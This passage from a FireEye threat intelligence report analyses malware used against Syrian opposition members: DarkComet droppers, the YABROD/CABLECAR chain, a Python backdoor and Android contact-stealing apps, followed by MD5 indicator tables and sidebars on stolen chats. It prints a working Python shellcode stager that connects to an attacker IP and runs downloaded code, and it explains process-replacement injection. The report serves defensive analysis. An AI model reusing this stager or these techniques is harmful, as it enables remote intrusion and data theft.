  Monday 20:09

  Monday 20:10

  Monday 20:21

  Today 8:27

SEND

BLACKSTAR, A CUSTOM DROPPER FOR THE DARKCOMET RAT
DarkComet is a widely available, stable, and easy to use remote administration tool (RAT) that allows 
a threat actor to control a compromised system. In addition to standard backdoor functions such as 
manipulating processes, services, the registry, and uploading and downloading files, DarkComet can 
also activate the webcam and microphone. Since DarkComet is so well known, security products such as 
antivirus software can often detect it.

This threat group uses a custom dropper which we call BLACKSTAR. BLACKSTAR contains an embedded, 
obfuscated binary which is a second dropper and launcher that we call REDDWARF. REDDWARF 
contains the actual DarkComet payload. BLACKSTAR writes REDDWARF to disk for persistence, but 
DarkComet itself is only ever extracted to memory by REDDWARF. Many antivirus vendors fail to detect 
this DarkComet backdoor because it is obfuscated inside the BLACKSTAR binary or because it is loaded 
into memory using process replacement.

BLACKSTAR malware performs the following actions:

1.  The BLACKSTAR binary (in this case, adobereadersetup-86x.exe, 

39632325327bf21f7d9cf02caf065646) is first extracted from two nested SFXRAR archives, as 
described above.

2.  BLACKSTAR contains two resources:15 

•	 QUYFKY\DIOKAK contains a decoder key for the configuration data and the embedded PE 

(REDDWARF).

•	 QUYFKY\UXLNYL contains the encoded configuration data which consists of function names that 

the malware resolves dynamically, as well as offsets used to extract the embedded PE.

3.  REDDWARF is actually contained within a Word document embedded within the BLACKSTAR 

binary. BLACKSTAR first finds the offset of the embedded Word file, then decodes the configuration 
data that includes the offset of the REDDWARF binary within the Word file.16 The embedded key 
is used to decode the embedded REDDWARF binary (8af83d74033aded17af538e4ccf12092). 
REDDWARF is loaded in to memory and executed, replacing the BLACKSTAR process in memory 
through a technique known as process replacement.17

15  The resource names vary across samples, and appear to consist of six random upper-case letters.

16  The Word document is never written to disk, and may simply be intended to further mask the REDDWARF binary.

17  Process replacement replaces a legitimate binary in memory with a malicious one. First, a legitimate binary is launched in a suspended state. The content of 
the legitimate binary is then unmapped from memory, memory is allocated at the original binary’s location, and the content of the malicious file is written to 
that memory space. The main suspended thread is pointed to the memory location of the malicious code, and the thread is resumed, executing the malware. 
By using process replacement the malicious code will appear to be the legitimate process to many analysis tools.

24

SPECIAL REPORT

NEEDING PASSPORTS

PERSON 1

PERSON 1

This redacted, translated 
and excerpted conversation 
appears to describe an attempt 
to secure forged passports 
and identity documents 
for the purpose of travel.  
Syrians attract much scrutiny 
while traveling overseas for 
many reasons, and a Syrian 
opposition member would 
have many motivations 
to conceal his or her true 
nationality.  The reason for 
avoiding Turkish documents 
may be that a Syrian would 
have a difficult time pretending 
to be Turkish, but a much 
easier time with another 
Arabic  speaking identity.

In full form, this 
conversation discloses 
opposition travel efforts 
and the forgery methods 
opposition members 
have sought to secure the 
documentation required 
to move in concealed 
fashion.  The Assad 
regime likely places a high 
priority on understanding 
opposition movements, 
the identities of its 
personnel, and methods 
for traveling discreetly.

13:08

13:09

PERSON 2

13:00

13:01

13:01

13:02

13:02

13:03

13:04

13:07

SEND

4.  REDDWARF contains two resources:

•	 RT_RCDATA\1 which contains the DarkComet binary 

(24f1658f3f38245dc15b9619bc97979b);

•	 RT_RCDATA\2 which contains plaintext configuration data. 

Similar to BLACKSTAR, the REDDWARF configuration 
data consists of function names that the malware resolves 
dynamically; the registry location that the malware should 
use for persistence; and (optionally) a file name that 
contains a script.

5.  REDDWARF extracts the DarkComet backdoor and spawns 

a copy of itself. It uses process replacement on that copy 
to launch the DarkComet backdoor in memory. Finally 
REDDWARF copies itself to disk, maintaining persistence via 
the registry entry specified in its configuration file (e.g., HKCU\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1).

We suspect that the malware authors used an automated tool 
to embed the DarkComet payload within the second binary and 

within the BLACKSTAR dropper. Interestingly, we observed at 
least one case where the payload may have been run through the 
packaging tool twice; that is, the BLACKSTAR dropper contained 
an embedded REDDWARF binary, which contained another 
BLACKSTAR dropper, which contained another REDDWARF 
binary, which contained the final DarkComet payload:

•	 BLACKSTAR	binary	(itself	contained	within	multiple	SFXRAR	files):	
GoogleUpdate.exe,7247d42b3b4632dc7ed9d8559596fff8.

•	 Embedded	REDDWARF	binary:	

1b20ea5887775f8eddf5aecd5d220154

•	 Embedded	BLACKSTAR	binary:	 

97a35a7471e0951ee4ed8581d2941601

•	 Embedded	REDDWARF	binary:	

dd08f85686bd48e4bab310d8fbff81a4

•	 Embedded	DarkComet	payload:	

ae1ea30e6fb834599a8fed11a9b00314

That particular BLACKSTAR dropper 
(7247d42b3b4632dc7ed9d8559596fff8) was dropped  
by at least four different original “lure” files.

25

YABROD DOWNLOADER AND CABLECAR LAUNCHER
This threat group deploys a set of malware consisting of an initial downloader that we call YABROD and a 
launcher that we call CABLECAR. 

The YABROD downloader contains embedded shellcode (used to download and execute a second binary) 
and an embedded, password-protected PDF stored in a PE resource named PDF. The PDF file is not 
malicious and acts as a decoy document, displaying relevant content to its intended victim. However, the 
PDF also contains a shellcode payload, and data used to generate an XOR key to decode the shellcode.

YABROD does not decode and execute the shellcode from the PDF on its own, but relies on a downloaded 
second-stage binary (CABLECAR) to do so. Some YABROD variants also contain an embedded, non-
malicious executable stored in a PE resource named EXE. The executable acts as a second decoy, installing 
a valid piece of software while the YABROD downloader runs in the background.

YABROD attempts to inject its embedded shellcode into a specified process on the victim computer; the 
process may vary depending on the YABROD sample. We identified variants that attempted to inject 
into Skype (skype.exe); various browser processes (chrome.exe, firefox.exe, iexplore.exe); 
or specific processes associated with Microsoft .NET (e.g., cvtres.exe). Presumably the threat actors 
selected processes they expected to be running on their victims’ computers. 

Once loaded into its target process, the YABROD shellcode connects to a specified C2 server via HTTP to 
download and execute a second file. We have identified samples that use a hard-coded IP address for C2, 
as well as samples that use a URL redirect to connect to a Dropbox account.

The YABROD samples we identified download an executable launcher that we call CABLECAR; 
CABLECAR parses the password-protected PDF dropped by YABROD to identify a 16-byte key and 
the embedded shellcode payload. The key is used with a substitution table from the CABLECAR binary 
to generate an XOR key to decode the shellcode payload from the PDF. CABLECAR then attempts to 
inject the shellcode into a specific process; similar to YABROD, the process may vary across samples but 
includes browsers (chrome.exe, firefox.exe, iexplore.exe) and .NET processes (vbc.exe). In the 
samples we analyzed, the shellcode payload was a Metasploit reverse shell; the shellcode is loaded only in 
to memory and never touches disk.

26

Figure 16: Yabrod password-protected PDF

Figure 17: Downloading the file Yabrod.pdf

DETAILED ANALYSIS
Below is a detailed analysis of a particular YABROD sample.

Step 1: The YABROD downloader (bd4769f37de88321a9b64e5f85baf1ef) attempts to launch the 

Microsoft .NET process %systemroot%\Microsoft.NET\Framework\v2.0.50727\cvtres.exe 
in a suspended state and inject its embedded shellcode into the process. After that, the downloader 
sleeps for 2 minutes to allow the shellcode to execute.

Step 2: The YABROD downloader checks for the existence of two PE resources, PDF #112 

and EXE #115. YABROD extracts an embedded password-protected PDF file 
(e0625817eb11874d806909a8c190d45a) from Resource PDF #112 and writes it to %temp%\
Yabrod.pdf.

Step 3: YABROD then extracts and executes an embedded executable decoy file from resource EXE 

#115, vpn7x32.exe (bc167bca4ca3cf6f2f2bd7e90ecdeb29), which is a legitimate installation 
program for a VPN client. Note: if the EXE resource exists, YABROD uses the embedded 
executable as the decoy file displayed to the user. If there were no EXE resource, YABROD would 
display the embedded PDF as a decoy instead, using the default application as specified in the 
Windows registry. An excerpt from the PDF’s content is shown in Figure 16.

Step 4: The YABROD shellcode injected into cvtres.exe downloads a file by making a HTTP request 
to 80.241.223.128/Yabrod.pdf using “n1” as the User-Agent. The downloaded file is placed 
in %temp% as GoogleUpdate.exe. A registry value GoogleUpdate is added under HKCU\
Software\Microsoft\Windows\CurrentVersion\Run and set to “%temp%\GoogleUpdate.
exe”. The %temp% environment variable is expanded prior to writing the registry value.

The download request and response are shown in Figure 17.

27

Figure 18: Libraries dropped

_ctypes.pyd 
_hashlib.pyd 
_socket.pyd 
_ssl.pyd 
bz2.pyd 
Imo-Pic.exe.manifest 
Microsoft.VC90.CRT.manifest 
msvcm90.dll 
msvcp90.dll 
msvcr90.dll 
python27.dll 
select.pyd 
unicodedata.pyd

Step 5: The YABROD downloader attempts to start the process %temp%\GoogleUpdate.exe without 

checking if the file exists.

Step 6: The downloaded executable (4e007cb87626f0093a84ed50b1d27a7f), a variant of the CABLECAR 

launcher, was launched on the victim system. CABLECAR parsed the PDF from step 2, looking for 
the second ">>stream" string following the first occurrence of the string "Encrypt". The location 
contained a 16-byte (0x10) key. CABLECAR then searched for the stream identified by subtype/
XML/Type/Metadata/stream. The key and a 256-byte (0x100) substitution table stored within 
CABLECAR itself were used to generate an XOR key to decrypt shellcode stored in the PDF stream. In 
this case, the shellcode was a copy of the Meterpreter reverse shell (meterpreter_reverse_tcp).

Step 7: CABLECAR creates a specific process (in this case, %systemroot%\Microsoft.NET\

Framework\v2.0.50727\vbc.exe)in a suspended state to inject the decoded shellcode18 
(vbc.exe is the Microsoft .NET Visual Basic Compiler).

Step 8: The Metasploit shellcode (4e007cb87626f0093a84ed50b1d27a7f) from the YABROD PDF file 
connects back to the C2 IP 80.241.223.128 on TCP port 55555, providing a remote shell to the 
threat actors. 

PYTHON-BASED BACKDOOR SHELLCODE LAUNCHER
This threat group uses another backdoor implemented as an encrypted Python script contained within a 
pyinstaller dropper.

The dropper, Facebook-Account.exe (64a17f5177157bb8c4199d38c46ec93b), was built using pyinstaller, a 
program that converts Python programs into standalone executable files.19 

The pyinstaller binary creates a folder under %temp% with the name _MEIXXXX, where XXXX is a random 
number. The folder is used to drop all the modules and libraries used by the packaged script. The dropped 
files include Microsoft Visual C++ runtime libraries (such as msvcm90.dll) as well as python27.dll and 
various Python binaries (.pyd files). The Python libraries appear to be from the 2.7.5 distribution of Python.

18  Interestingly, instead of using the traditional CreateRemoteThread function call to execute the injected shellcode, the malware uses the undocumented 

function RtlCreateUserThread.RtlCreateUserThread avoids problems associated with different privileges that may exist between the injecting process 
(CABLECAR) and the target process and helps ensure the injection will succeed.

19   http://www.pyinstaller.org/

28

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

The malicious Python 
script is decrypted in 
memory as shown in 
Figure 19: 

Figure 19: Malicious Python script decoded

import struct, socket, binascii, ctypes, random, time
HoAaKvZAEyhHfv, ghHICmgBqfYrOcL = None, None
def CpkyBfJGA():
  try:
    global ghHICmgBqfYrOcL
    ghHICmgBqfYrOcL = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ghHICmgBqfYrOcL.connect(('80.241.223.128', 55555))
    eDkZgDbDN = struct.pack('<i', ghHICmgBqfYrOcL.fileno())
    l = struct.unpack('<i', str(ghHICmgBqfYrOcL.recv(4)))[0]
    MTaURf = "     "
    while len(MTaURf) < l: MTaURf += ghHICmgBqfYrOcL.recv(l)
    GPvRqDBvWy = ctypes.create_string_buffer(MTaURf, len(MTaURf))
    GPvRqDBvWy[0] = binascii.unhexlify('BF')
    for i in xrange(4): GPvRqDBvWy[i+1] = eDkZgDbDN[i]
    return GPvRqDBvWy
  except: return None
def FurDIGvZs(oLKKrJ):
  if oLKKrJ != None:
    AzXoBTMrVkytXs = bytearray(oLKKrJ)
    NDIloqhwTpMY = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(AzXoBTMrVkytXs)),
                                                    ctypes.c_int(0x3000),
                                                    ctypes.c_int(0x40))
    ctypes.windll.kernel32.VirtualLock(ctypes.c_int(NDIloqhwTpMY),
                                       ctypes.c_int(len(AzXoBTMrVkytXs)))
    poHzKwIQjkvRAsE = (ctypes.c_char  
*len(AzXoBTMrVkytXs)).from_buffer(AzXoBTMrVkytXs)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(NDIloqhwTpMY), 
                                         poHzKwIQjkvRAsE,
                                         ctypes.c_int(len(AzXoBTMrVkytXs)))
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.c_int(NDIloqhwTpMY),
                                             ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.pointer(ctypes.c_int(0))) 

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
HoAaKvZAEyhHfv = CpkyBfJGA()
 
FurDIGvZs(HoAaKvZAEyhHfv)

Once the malicious python script is decoded, it is executed via PyRun_SimpleString by the pyinstaller 
binary. The malicious script connects to 80.241.223.128 on TCP port 55555 and downloads data, copies 
it to memory, decodes it, and executes it in its own thread.

29

Figure 20: 
Android app 
front-end

ANDROID BACKDOORS
We identified two pieces of Android malware associated with this threat group. Both variants are able to 
steal contact names, phone numbers, and the phone’s username. In addition, one of the variants is also 
able to transmit a device’s geographic location to the malware’s C2 server.

The two Android backdoors were as follows:

•	 Syria-Twitter.apk (b91315805ef1df07bdbfa07d3a467424)
•	 Rasoo-dl.apk (e0b1caec74f31e8196a250f133f4345a)

Both applications were signed with the same self-signed certificate:

Figure 21: Self-signed certificate details

Version: V3 
Serial Number: 2d744830 
Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 
Signature Hash Algorithm: sha256 
Issuer: CN=Sami AlShami, OU=ShamDroidz-DEV, O=ShamDroidz, L=Homs, ST=Homs, C=SY 
Valid From: Thursday, August 15, 2013 9:59:52 PM 
Valid To: Monday, August 09,2038 9:59:52 PM 
Subject: CN=Sami AlShami, OU=ShamDroidz-DEV, O=ShamDroidz, L=Homs,  
ST=Homs, C=SY 
Public Key: RSA (2048 bits) 
Thumbprint: 9f 67 a5 fb 87 60 ce 33 1f c1 fe 79 c5 3d e2 e2 d9 fd 0b 66

The “Syria Twitter” application, shown below, was published on August 27, 2013, and had over 100 
downloads on Google Play before being removed. The “Rasoo-dl” application does not appear to have 
been distributed via Google Play.

30

Both applications use the following permissions, which allow them to perform the listed tasks:

•  INTERNET: Connect to the Internet
•	 ACCESS_NETWORK_STATE: Check the cellular network connectivity
•	 GET_ACCOUNTS: Get all the accounts used by the phone for authentication
•	 READ_CONTACTS: Read all the contacts

The “Rasoo-dl” application has the following additional permission:

•	 ACCESS_FINE_LOCATION: Show the victim’s physical location

Both apps contain code (shown in Figure 22) to steal contact names and phone numbers from the victim’s 
phone and transmit them via HTTP POST requests (in the format contact&=<username>&<contact_
name>&<contact_phone>) to a specific C2 location:

Figure 22: Sending stolen data to C2

31

Below is an example of traffic generated by the “Syria-Twitter” application (data displayed below is crafted 
and not actual contact data): 

Figure 22: Example of traffic generated by the "Syria-Twitter" application

POST /contacts HTTP/1.1 
Content-Length: 43 
Content-Type: application/x-www-form-urlencoded 
Host: 80.241.223.128:4646 
Connection: Keep-Alive 
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
contact%26=null%26John+Rogers%26+2175566789
POST /contacts HTTP/1.1 
Content-Length: 44 
Content-Type: application/x-www-form-urlencoded 
Host: 80.241.223.128:4646 
Connection: Keep-Alive 
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
contact%26=null%26Wangzhi+Chen%26+6312134560

“Rasoo-dl” contains additional code to send a device’s geographic location, also via an HTTP POST request:

Figure 23: Sending the device’s geographic location to the C2 server

32

SPECIAL REPORT

OPPOSITION WEAPONS ACQUISITION

PERSON 1

PERSON 1

[REDACTED]

In this redacted, translated 
and condensed conversation, 
two members of the 
opposition are discussing 
the transfer of between 5-10 
Russian-made anti-tank 
missiles and launchers. The 
missile system is the 9M113 
Semi-Automatic Command 
to Line of Sight (SACLOS) 
Anti-Tank Guided Missile 
(ATGMs), NATO designator: 
AT-5 SPANDREL. They 
appear to be referring to 
a Tamdem High Explosive 
Anti-Tank warhead version of 
the missile, which would be 
particularly effective against 
armored vehicles and tanks. 
FSA-linked groups facing 
the Assad regime’s Tanks 
have extensively used the 
9m 113 missile in Syria, and 
a number of YouTube videos 
show successful ‘hits’ against 
regime materiel.

 17:41

  17:52

Screenshot of an AT-5 
missile from the Wikipedia 
page referenced by Person 2 
within the chat

[REDACTED]

  18:09

In full form, this conversation 
contains sensitive information 
regarding opposition weapons 
acquisition efforts. The 
conversation includes details 
regarding the desired quantity 
of missiles for acquisition, 
the precise delivery location, 
timelines and procedures for 
transfer. Individuals involved 
in this weapons procurement 
may have been put at risk, 
along with broader opposition 
logistics methods, perhaps 
affecting future weapons 
acquisition efforts.   

 17:15

PERSON 2

  17:17

  17:50

  17:55

 17:56

  17:57

  17:58

 18:10

 18:16

 18:18

 18:19

 18:24

  18:27

SEND

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

MALWARE SAMPLES
Below are the files and MD5 hashes for the malware associated with this threat group.

Table 1: List of malicious file names and MD5 hashes

File Name

idm-en-setup.exe

IslamArmyThem.exe

Keyboard-Sounds.exe

MD5

Description

0187be3ccf42c143ab96e7bbf2efbf2f

Dropper (SFXRAR)

0cc7b05c220ecbeb52891d49f1ab41ab

Dropper (SFXRAR)

29e79080b2b2de01b53223542b46d570 Dropper (SFXRAR)

2a456e35918700bc76f6ec1dd9ea93a1

Dropper (SFXRAR)

36875b44145cf20b8d3148e7f7efcea0

Dropper (SFXRAR)

3ffc4e4081854d04d8217c2ebabdd61d

Dropper (SFXRAR)

Pdf-to-Word-Converter.exe

4268e2a8209429155ef5df22ca17c0be

Dropper (SFXRAR)

from-aliwa2-doctor-salim-dris-to-whom-it-may-concern.exe

465a0bf22cd101dbd502a2576f10ceb4

Dropper (SFXRAR)

diplaced-syrian-people-cod.exe

4cd035012ec6015e48f6fb7001330a95

Dropper (SFXRAR)

Displaced-Syrians-Suffering_cod.exe

install_flashplayer11x32_gdrd_aih.exe

JetCleanSetup.exe

4d70791db506cb04e62b607e1f57699c

Dropper (SFXRAR)

5e334057856967a5d31c266c550549b0

Dropper (SFXRAR)

6439ccba5b06e434953ba209b8b07107

Dropper (SFXRAR)

6608ce246612d490f3b044627a5e6d9e

Dropper (SFXRAR)

692265ba1d4a5b2773e596d3491ed2be

Dropper (SFXRAR)

7091f135e4718586d16b56c04b21a6b7

Dropper (SFXRAR)

Syrian-Girl-Against-Regime_gpj.exe

8a0a36d0d1d91b357e5ce8f84ad16346

Dropper (SFXRAR)

Maktal-Kiyadi-Barez-men-hizbillah-fi-ltafgir-l2akhir-fi-
ldahya12300012.exe

931bafa20756eaf8b5371222b5b81a61

Dropper (SFXRAR)

AdobeReader-9-En-Us.exe

Eye-Protector-Portial-Setup.exe

Billiards.exe

New-Iman-Picture.pif

980c6e7f8a10144a28730f3f0adb99d0

Dropper (SFXRAR)

99655bacbe845ad30c6c5ed56a7e13d4

Dropper (SFXRAR)

a19e70ffa130a096753463b23733927d

Dropper (SFXRAR)

a577701d4b5ada66912a242a7772b48a

Dropper (SFXRAR)

a9e5ec23ccdec9cd79af771e2dbf54d5

Dropper (SFXRAR)

c79ad54dead0b446fe8fac60cbd133a7

Dropper (SFXRAR)

Live-Chat-ooVoo-Setup.exe

c808ef1ab997d0234ee889ecd5176c8e

Dropper (SFXRAR)

Syrian-Girl-Against-Regime_gpj.exe

d023fc719fba710b44f140deff3f83e4

Dropper (SFXRAR)

Syrian-chlidren-under-execution_fdp.exe

d32aaf60744678e559db59fbe2daa938

Dropper (SFXRAR)

nazhin.exe

Video-Downloader.exe

Amer-Mohemmeh.exe

Live-Chat-ooVoo-Setup.exe

Russia-vs-Amerika.exe

google-update.sfx.exe

adobereadersetup-86x.sfx.exe

47702a6cdc59859ec97c99aa31148ae6

d87356940d3b15d87453ead6374691ab

Dropper (SFXRAR)

dc33cbf669df01302ddd124b028a4fd9

Dropper (SFXRAR)

e403972c890cf2eb0a361a91ac5ffe5e

Dropper (SFXRAR)

e41c913327e6974730da99e7c327a2a2

Dropper (SFXRAR)

e65bdb88e606c45521ab2c04c650ed86

Dropper (SFXRAR)

ef56383f53b7ccb08016737c98fe2982

Dropper (SFXRAR)

27c2b873849227de45ec10fca112f322

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

34

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

Table 1: List of malicious file names and MD5 hashes

File Name

adobeflash.sfx.exe

oovoo-setup.sfx.exe

microtec.sfx.exe

MD5

4bd3ea86eb7d63b1bdd001e6adbe8b89

57cbbe8e7d18b1980cfc4bc87121b2c7

5ae84cadc1ea5a4bcc027a19eca514c5

Microsoft-Update.sfx.exe

63fb57fd90590c3c0d0d95d86b6df66d

adobesetup.sfx.exe

748b8aca1c17415648b80f0038381097

adobesetupx86.sfx.exe

81ef5426583e1d6df4193f38402b40c1

office-word-update.sfx.exe

9491c4e0c08c9347421ae352f14a1329

update-flashplayer11.sfx.exe

a1e0d40715f66f30aad44ab4c15a474a

install_flashplayer11x32_gdrd_aih.exe

b23b16b3cccba9c1ecd0c0d17cc48979

adobesetupx86.sfx.exe

adobesetupx86.sfx.exe

b9623abd519ee688e0b9d9350c83e209

d4b4367f874c9c8d645b1560f9d259ea

adobereader-86x.sfx.exe

d620deacd018da09a69e24cb978f556d

adobesetup32.sfx.exe

adobe32en.sfx.exe

d672e9789f22b806a295f0dd2122316a

e2a624302af7a3eeb59cbb58f36b0fac

adobereader-86x-64x.sfx.exe

f7f8538d2ab0ffee878a4e512230f97d

adobesetupx86.sfx.exe

f893d5d351a3ffc1f89a8ec8147cd060

adobred-86x.sfx.exe

fda3816d0bac2e4791cbcfaf33416633

adobesetupx86.sfx.exe

ff97bc797ed27b5e21e4e4a6e7443219

Description

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected SFXRAR)

Dropper (password-
protected

Dropper (password-
protected SFXRAR)

adobesetup.exe

adobe32en.exe_

adobereadersetup-86x.exe_

adobex86setup.sfx.exe

google-update.exe

adobereader-86x.exe

163595b20debdeccdeaf4cb14fba737c

BLACKSTAR

202eb180f5faa8460941ae60cf63da63

BLACKSTAR

39632325327bf21f7d9cf02caf065646

BLACKSTAR

64eb08013399e3ac18c936d361d80e17

BLACKSTAR

7247d42b3b4632dc7ed9d8559596fff8

BLACKSTAR

7576127f8bd805b30d0016d897211f54

BLACKSTAR

35

SPECIAL REPORT

Behind the Syrian Conflict’s Digital Front Lines

Table 1: List of malicious file names and MD5 hashes

File Name

adobesetupx86.exe

adobred-86x.exe

adobereader-86x-64x.exe

adobeflash.exe

adobesetup32.exe_

adobeinsx86.exe

adobesetupx86.exe

microtec.exe

googleupdate.exe_

microsoft-update.exe

MD5

Description

89dda79018d6216970a274b16b3494ad

BLACKSTAR

a641c08e09c53858d16c0c70107979b5v

BLACKSTAR

a691e4b629da2b37dd87e760bfb0106e

BLACKSTAR

c421f4e12892d4ac345e7b03f6a053d2

BLACKSTAR

d1f817744f79dad415a526c4ce51bed9

BLACKSTAR

de65eed45ac210c66db8082f1a72db8f

BLACKSTAR

e11aeb603cb7a31c2028976a2deed550

BLACKSTAR

0bf0e05247b986c484dbfe53ebb8ac48

DARKCOMET

ae1ea30e6fb834599a8fed11a9b00314

DARKCOMET

6b5aabd26998568d9ca628713b53cacf

ONESIZE

flashplayer11x32_gdrd_aih.exe

b68a7e216cb0d18030048935b67e0d68

ONESIZE

bayan09072013_pdf.exe

Keyboard-Sounds.exe

reporthezbolla20072013_pdf.exe

VPN7.exe

0e24a0060493bcb85ce4a5110550f204

YABROD

1328d3d4872bfe2c98fd7b672d8dff1b

508deeb6a5a37e9f94d5d4733ce0352f

bd4769f37de88321a9b64e5f85baf1ef

f18dedf9f5d213deba18a2e037819ea1

YABROD

YABROD

YABROD

YABROD

44df02ac28d80deb45f5c7c48b56a858

44df02ac28d80deb45f5c7c48b56a858

YABROD PDF

78c5670e2cee9b5c3b88aa9cb27519be.pdf

78c5670e2cee9b5c3b88aa9cb27519be

YABROD PDF

9d351b9ee731d88f12fcaa64010e828d.pdf

9d351b9ee731d88f12fcaa64010e828d

YABROD PDF

yabrod.pdf

greenhill.png

e0625817eb11874d806909a8c190d45a

YABROD PDF

182c7b1ad894852d23f4de538e59ac2b

CABLECAR

4e007cb87626f0093a84ed50b1d27a7f

4e007cb87626f0093a84ed50b1d27a7f

CABLECAR

Facebook-Account.exe

64a17f5177157bb8c4199d38c46ec93b

Dropper for 
pyinstaller malware

syria-twitter.apk

rasoo-dl.apk

b91315805ef1df07bdbfa07d3a467424

Android Malware

e0b1caec74f31e8196a250f133f4345a

Android Malware

36

To download this or other FireEye Threat Intelligence reports, 
visit: www.fireeye.com/current-threats/threat-intelligence-reports.html

FireEye, Inc.  |  1440 McCarthy Blvd. Milpitas, CA 95035  |  408.321.6300  |  877.FIREEYE (347.3393)  |  info@fireeye.com  |  www.fireeye.com

© 2015 FireEye, Inc. All rights reserved. FireEye is a registered trademark of 
FireEye, Inc. All other brands, products, or service names are or may be trademarks 
or service marks of their respective owners. SP.SYR.EN-US.022015

